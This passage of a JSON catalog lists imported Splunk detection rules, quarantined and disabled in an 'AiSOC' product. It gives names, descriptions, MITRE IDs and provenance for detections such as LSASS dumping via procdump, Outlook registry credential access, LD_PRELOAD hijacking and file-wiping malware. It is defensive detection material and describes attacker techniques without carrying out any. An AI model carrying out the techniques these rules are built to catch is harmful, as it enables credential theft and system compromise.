If confirmed malicious, this activity could indicate an attempt to establish unauthorized network connections, potentially leading to data exfiltration or further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rundll32-with-no-command-line-arguments-with-network.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "35307032-a12d-11eb-835f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/rundll32_with_no_command_line_arguments_with_network.yml" } }, { "id": "splunk-security-content-355ba810-0a20-4215-8485-9ce3f87f2e38", "type": "detection", "name": "Windows Excessive Usage Of Net App", "description": "The following analytic detects excessive usage of `net.exe` within a one-minute interval. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, parent processes, and command-line executions. This behavior is significant as it may indicate an adversary attempting to create, delete, or disable multiple user accounts rapidly, a tactic observed in Monero mining incidents. 
If confirmed malicious, this activity could lead to unauthorized user account manipulation, potentially compromising system integrity and enabling further malicious actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-excessive-usage-of-net-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "355ba810-0a20-4215-8485-9ce3f87f2e38", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_excessive_usage_of_net_app.yml" } }, { "id": "splunk-security-content-3596a799-6320-4a2f-8772-a9e98ddb2960", "type": "detection", "name": "Windows Data Destruction Recursive Exec Files Deletion", "description": "The following analytic identifies a suspicious process that is recursively deleting executable files on a compromised host. It leverages Sysmon Event Codes 23 and 26 to detect this activity by monitoring for a high volume of deletions or overwrites of files with extensions like .exe, .sys, and .dll. This behavior is significant as it is commonly associated with destructive malware such as CaddyWiper, DoubleZero, and SwiftSlicer, which aim to make file recovery impossible. 
If confirmed malicious, this activity could lead to significant data loss and system instability, severely impacting business operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-data-destruction-recursive-exec-files-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3596a799-6320-4a2f-8772-a9e98ddb2960", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_data_destruction_recursive_exec_files_deletion.yml" } }, { "id": "splunk-security-content-35a61ed8-61c4-11ec-bc1e-acde48001122", "type": "detection", "name": "Suspicious Computer Account Name Change", "description": "The following analytic detects a suspicious computer account name change in Active Directory. It leverages Event ID 4781, which logs account name changes, to identify instances where a computer account name is changed to one that does not end with a `$`. This behavior is significant as it may indicate an attempt to exploit CVE-2021-42278 and CVE-2021-42287, which can lead to domain controller impersonation and privilege escalation. 
If confirmed malicious, this activity could allow an attacker to gain elevated privileges and potentially control the domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-computer-account-name-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "35a61ed8-61c4-11ec-bc1e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_computer_account_name_change.yml" } }, { "id": "splunk-security-content-35aeb0e7-7de5-444a-ac45-24d6788796ec", "type": "detection", "name": "Windows Spearphishing Attachment Onenote Spawn Mshta", "description": "The following analytic detects OneNote spawning `mshta.exe`, a behavior often associated with spearphishing attacks. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where OneNote is the parent process. This activity is significant as it is commonly used by threat actors and malware families such as TA551, AsyncRat, Redline, and DCRAT to execute malicious scripts. If confirmed malicious, this could allow attackers to execute arbitrary code, potentially leading to data exfiltration, system compromise, or further malware deployment. 
Immediate investigation and containment are recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-spearphishing-attachment-onenote-spawn-mshta.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "35aeb0e7-7de5-444a-ac45-24d6788796ec", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_spearphishing_attachment_onenote_spawn_mshta.yml" } }, { "id": "splunk-security-content-35c50572-a70b-452f-afa9-bebdf3c3ce36", "type": "detection", "name": "Linux Auditd Preload Hijack Library Calls", "description": "The following analytic detects the use of the LD_PRELOAD environment variable to hijack or hook library functions on a Linux platform. It leverages data from Linux Auditd, focusing on process execution logs that include command-line details. This activity is significant because adversaries, malware authors, and red teamers commonly use this technique to gain elevated privileges and establish persistence on a compromised machine. 
If confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, and maintain long-term access to the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-preload-hijack-library-calls.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "35c50572-a70b-452f-afa9-bebdf3c3ce36", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_preload_hijack_library_calls.yml" } }, { "id": "splunk-security-content-35cd29ca-f08c-4489-8815-f715c45460d3", "type": "detection", "name": "Windows Ldifde Directory Object Behavior", "description": "The following analytic identifies the use of Ldifde.exe, a command-line utility for creating, modifying, or deleting LDAP directory objects. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution and command-line arguments. Monitoring Ldifde.exe is significant because it can be used by attackers to manipulate directory objects, potentially leading to unauthorized changes or data exfiltration. 
If confirmed malicious, this activity could allow an attacker to gain control over directory services, escalate privileges, or access sensitive information within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ldifde-directory-object-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "35cd29ca-f08c-4489-8815-f715c45460d3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ldifde_directory_object_behavior.yml" } }, { "id": "splunk-security-content-35eb6d19-a497-400c-93c5-645562804b11", "type": "detection", "name": "Windows Service Created with Suspicious Service Name", "description": "The following analytic detects the creation of a Windows Service with a known suspicious or malicious name using Windows Event ID 7045. It leverages logs from the `wineventlog_system` to identify these services installations. This activity is significant as adversaries, including those deploying Clop ransomware, often create malicious services for lateral movement, remote code execution, persistence, and execution. 
If confirmed malicious, this could allow attackers to maintain persistence, execute arbitrary code, and potentially escalate privileges, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-created-with-suspicious-service-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "35eb6d19-a497-400c-93c5-645562804b11", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_created_with_suspicious_service_name.yml" } }, { "id": "splunk-security-content-360ae6b0-38b5-4328-9e2b-bc9436cddb17", "type": "detection", "name": "Windows Process Injection Wermgr Child Process", "description": "The following analytic identifies a suspicious instance of wermgr.exe spawning a child process unrelated to error or fault handling. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process relationships and command-line executions. This activity is significant as it can indicate Qakbot malware, which injects malicious code into wermgr.exe to evade detection and execute malicious actions. 
If confirmed malicious, this behavior could allow an attacker to conduct reconnaissance, execute arbitrary code, and persist within the network, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-injection-wermgr-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "360ae6b0-38b5-4328-9e2b-bc9436cddb17", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_injection_wermgr_child_process.yml" } }, { "id": "splunk-security-content-36334123-077d-47a2-b70c-6c7b3cc85049", "type": "detection", "name": "Windows Unsecured Outlook Credentials Access In Registry", "description": "The following analytic detects unauthorized access to Outlook credentials stored in the Windows registry. It leverages Windows Security Event logs, specifically EventCode 4663, to identify access attempts to registry paths associated with Outlook profiles. This activity is significant as it may indicate attempts to steal sensitive email credentials, which could lead to unauthorized access to email accounts. 
If confirmed malicious, this could allow attackers to exfiltrate sensitive information, impersonate users, or execute further unauthorized actions within Outlook, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unsecured-outlook-credentials-access-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "36334123-077d-47a2-b70c-6c7b3cc85049", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unsecured_outlook_credentials_access_in_registry.yml" } }, { "id": "splunk-security-content-36e46ebe-065a-11ec-b4c7-acde48001122", "type": "detection", "name": "Get ADDefaultDomainPasswordPolicy with Powershell", "description": "The following analytic detects the execution of `powershell.exe` running the `Get-ADDefaultDomainPasswordPolicy` cmdlet, which is used to retrieve the password policy in a Windows domain.\nThis detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions.\nMonitoring this activity is crucial as it can indicate attempts by adversaries to gather information about domain policies for situational awareness and Active Directory discovery.\nIf confirmed malicious, this activity could lead to further reconnaissance and potential exploitation of domain security settings.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", 
"category": "_quarantine", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-addefaultdomainpasswordpolicy-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "36e46ebe-065a-11ec-b4c7-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_addefaultdomainpasswordpolicy_with_powershell.yml" } }, { "id": "splunk-security-content-36f9626c-4272-4808-aadd-267acce681c0", "type": "detection", "name": "Windows Modify Registry LongPathsEnabled", "description": "The following analytic detects a modification to the Windows registry setting \"LongPathsEnabled,\" which allows file paths longer than 260 characters. This detection leverages data from the Endpoint.Registry datamodel, focusing on changes to the specific registry path and value. This activity is significant because adversaries, including malware like BlackByte, exploit this setting to bypass file path limitations, potentially aiding in evasion techniques. 
If confirmed malicious, this modification could facilitate the execution of long-path payloads, aiding in persistence and further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-longpathsenabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "36f9626c-4272-4808-aadd-267acce681c0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_longpathsenabled.yml" } }, { "id": "splunk-security-content-3718549b-867e-4084-b770-790e8dab6ab8", "type": "detection", "name": "Windows MSTSC RDP Commandline", "description": "The following analytic detects the use of the mstsc.exe command-line, which is commonly used to initiate Remote Desktop Protocol (RDP) connections. This detection focuses on instances where mstsc.exe is executed with specific parameters that may indicate suspicious or unauthorized remote access attempts. 
Monitoring command-line arguments such as /v: for direct connections or /admin for administrative sessions can help identify potential misuse or lateral movement within a network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-mstsc-rdp-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3718549b-867e-4084-b770-790e8dab6ab8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_mstsc_rdp_commandline.yml" } }, { "id": "splunk-security-content-372176ba-450c-4abd-9b86-419bb44c1b76", "type": "detection", "name": "GitHub Enterprise Disable Classic Branch Protection Rule", "description": "The following analytic detects when classic branch protection rules are disabled in GitHub Enterprise. The detection monitors GitHub Enterprise audit logs for branch protection removal events by tracking actor details, repository information, and associated metadata. For a SOC, identifying disabled branch protection is critical as it could indicate attempts to bypass code review requirements and security controls. Branch protection rules are essential security controls that enforce code review, prevent force pushes, and maintain code quality. Disabling these protections could allow malicious actors to directly push unauthorized code changes or backdoors to protected branches. 
The impact of disabled branch protection includes potential code tampering, bypass of security reviews, introduction of vulnerabilities or malicious code, and compromise of software supply chain integrity. This activity could be part of a larger attack chain where an adversary first disables security controls before attempting to inject malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-disable-classic-branch-protection-rule.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "372176ba-450c-4abd-9b86-419bb44c1b76", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_disable_classic_branch_protection_rule.yml" } }, { "id": "splunk-security-content-3742ebfe-64c2-11eb-ae93-0242ac130002", "type": "detection", "name": "Dump LSASS via procdump", "description": "The following analytic detects the use of procdump.exe to dump the LSASS\nprocess, specifically looking for the -mm and -ma command-line arguments. It leverages\ndata from Endpoint Detection and Response (EDR) agents, focusing on process names,\ncommand-line executions, and parent processes. This activity is significant because\ndumping LSASS can expose sensitive credentials, posing a severe security risk. 
If\nconfirmed malicious, an attacker could obtain credentials, escalate privileges,\nand move laterally within the network, leading to potential data breaches and further\ncompromise of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/dump-lsass-via-procdump.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3742ebfe-64c2-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/dump_lsass_via_procdump.yml" } }, { "id": "splunk-security-content-374832b1-3603-420c-b456-b373e24d34c0", "type": "detection", "name": "AWS Multi-Factor Authentication Disabled", "description": "The following analytic detects attempts to disable multi-factor authentication (MFA) for an AWS IAM user. It leverages AWS CloudTrail logs to identify events where MFA devices are deleted or deactivated. This activity is significant because disabling MFA can indicate an adversary attempting to weaken account security, potentially to maintain persistence using a compromised account. 
If confirmed malicious, this action could allow attackers to retain access to the AWS environment without detection, posing a significant risk to the security and integrity of the cloud infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556.006", "T1586.003", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-multi-factor-authentication-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "374832b1-3603-420c-b456-b373e24d34c0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_multi_factor_authentication_disabled.yml" } }, { "id": "splunk-security-content-37a0ec8d-827e-4d6d-8025-cedf31f3a149", "type": "detection", "name": "Cloud Compute Instance Created By Previously Unseen User", "description": "The following analytic identifies the creation of cloud compute instances by users who have not previously created them. It leverages data from the Change data model, focusing on 'create' actions by users, and cross-references with a baseline of known user activities. This activity is significant as it may indicate unauthorized access or misuse of cloud resources by new or compromised accounts. 
If confirmed malicious, attackers could deploy unauthorized compute instances, leading to potential data exfiltration, increased costs, or further exploitation within the cloud environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cloud-compute-instance-created-by-previously-unseen-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "37a0ec8d-827e-4d6d-8025-cedf31f3a149", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/cloud_compute_instance_created_by_previously_unseen_user.yml" } }, { "id": "splunk-security-content-383572e0-04c5-11ec-bdcc-acde48001122", "type": "detection", "name": "Domain Account Discovery with Wmic", "description": "The following analytic detects the execution of `wmic.exe` with command-line arguments used to query for domain users. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line patterns indicative of domain account discovery. This activity is significant as it often precedes lateral movement or privilege escalation attempts by adversaries. 
If confirmed malicious, this behavior could allow attackers to map out user accounts within the domain, facilitating further attacks and potentially compromising sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/domain-account-discovery-with-wmic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "383572e0-04c5-11ec-bdcc-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/domain_account_discovery_with_wmic.yml" } }, { "id": "splunk-security-content-386ad394-c9a7-4b4f-b66f-586252de20f0", "type": "detection", "name": "Windows Large Number of Computer Service Tickets Requested", "description": "The following analytic detects a high volume of Kerberos service ticket requests, specifically more than 30, from a single source within a 5-minute window. It leverages Event ID 4769, which logs when a Kerberos service ticket is requested, focusing on requests with computer names as the Service Name. This behavior is significant as it may indicate malicious activities such as lateral movement, malware staging, or reconnaissance. 
If confirmed malicious, an attacker could gain unauthorized access to multiple endpoints, potentially compromising the entire network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1135", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-large-number-of-computer-service-tickets-requested.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "386ad394-c9a7-4b4f-b66f-586252de20f0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_large_number_of_computer_service_tickets_requested.yml" } }, { "id": "splunk-security-content-386dd914-16e5-400b-9bf6-25572cc4415a", "type": "detection", "name": "Crowdstrike User with Duplicate Password", "description": "The following analytic detects CrowdStrike alerts for non-admin accounts with duplicate password risk, identifying instances where multiple non-admin users share the same password. This practice weakens security and increases the potential for unauthorized access. 
Addressing these alerts is essential to ensure each user account has a unique, strong password, thereby enhancing overall security and protecting sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crowdstrike-user-with-duplicate-password.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "386dd914-16e5-400b-9bf6-25572cc4415a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/crowdstrike_user_with_duplicate_password.yml" } }, { "id": "splunk-security-content-387b278a-6326-11ec-aa2c-acde48001122", "type": "detection", "name": "Linux Install Kernel Module Using Modprobe Utility", "description": "The following analytic detects the installation of a Linux kernel module using the modprobe utility. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because installing a kernel module can indicate an attempt to deploy a rootkit or other malicious kernel-level code, potentially leading to elevated privileges and bypassing security detections. 
If confirmed malicious, this could allow an attacker to gain persistent, high-level access to the system, compromising its integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-install-kernel-module-using-modprobe-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "387b278a-6326-11ec-aa2c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_install_kernel_module_using_modprobe_utility.yml" } }, { "id": "splunk-security-content-387c4e78-f4a4-413d-ad44-e9f7bc4642c9", "type": "detection", "name": "Linux Busybox Privilege Escalation", "description": "The following analytic detects the execution of BusyBox with sudo privileges, which can lead to privilege escalation on Linux systems. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where BusyBox is executed with both 'sh' and 'sudo' commands. This activity is significant because it indicates a user may be attempting to gain root access, bypassing standard security controls. 
If confirmed malicious, this could allow an attacker to execute arbitrary commands as root, leading to full system compromise and potential persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-busybox-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "387c4e78-f4a4-413d-ad44-e9f7bc4642c9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_busybox_privilege_escalation.yml" } }, { "id": "splunk-security-content-38cbd42c-1098-41bb-99cf-9d6d2b296d83", "type": "detection", "name": "WMI Temporary Event Subscription", "description": "The following analytic detects the creation of WMI temporary event subscriptions. It leverages Windows Event Logs, specifically EventCode 5860, to identify these activities. This detection is significant because attackers often use WMI to execute commands, gather information, or maintain persistence within a compromised system. If confirmed malicious, this activity could allow an attacker to execute arbitrary code, escalate privileges, or persist in the environment. 
Analysts should review the specific WMI queries and assess their intent, considering potential false positives from legitimate administrative tasks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wmi-temporary-event-subscription.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "38cbd42c-1098-41bb-99cf-9d6d2b296d83", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wmi_temporary_event_subscription.yml" } }, { "id": "splunk-security-content-38f034ed-1598-46c8-95e8-14edf05fdf5d", "type": "detection", "name": "Microsoft Defender ATP Alerts", "description": "The following analytic leverages alerts from Microsoft Defender ATP. The query aggregates and summarizes all Microsoft Defender ATP alerts, providing details such as the source, file name, severity, process command line, IP address, registry key, signature, description, unique ID, and timestamps. This detection is not intended to identify new activity from raw data; it leverages Microsoft-provided alerts so they can be correlated with other data as part of risk-based alerting. The data contained in the alert is mapped not only to the risk object but also to the threat object. This detection filters out evidence that Microsoft has given a verdict of clean. It dynamically maps the MITRE technique at search time to auto-populate the annotation field with the value provided in the alert. 
It also uses a dynamic mapping to set the risk score in Enterprise Security based on the severity of the alert.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/microsoft-defender-atp-alerts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "38f034ed-1598-46c8-95e8-14edf05fdf5d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/microsoft_defender_atp_alerts.yml" } }, { "id": "splunk-security-content-38fe731c-1f13-43d4-b878-a5bbe44807e3", "type": "detection", "name": "Windows IIS Components Add New Module", "description": "The following analytic detects the execution of AppCmd.exe to install a new module in IIS. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as adversaries may use it to install webshells or backdoors, leading to credit card scraping, 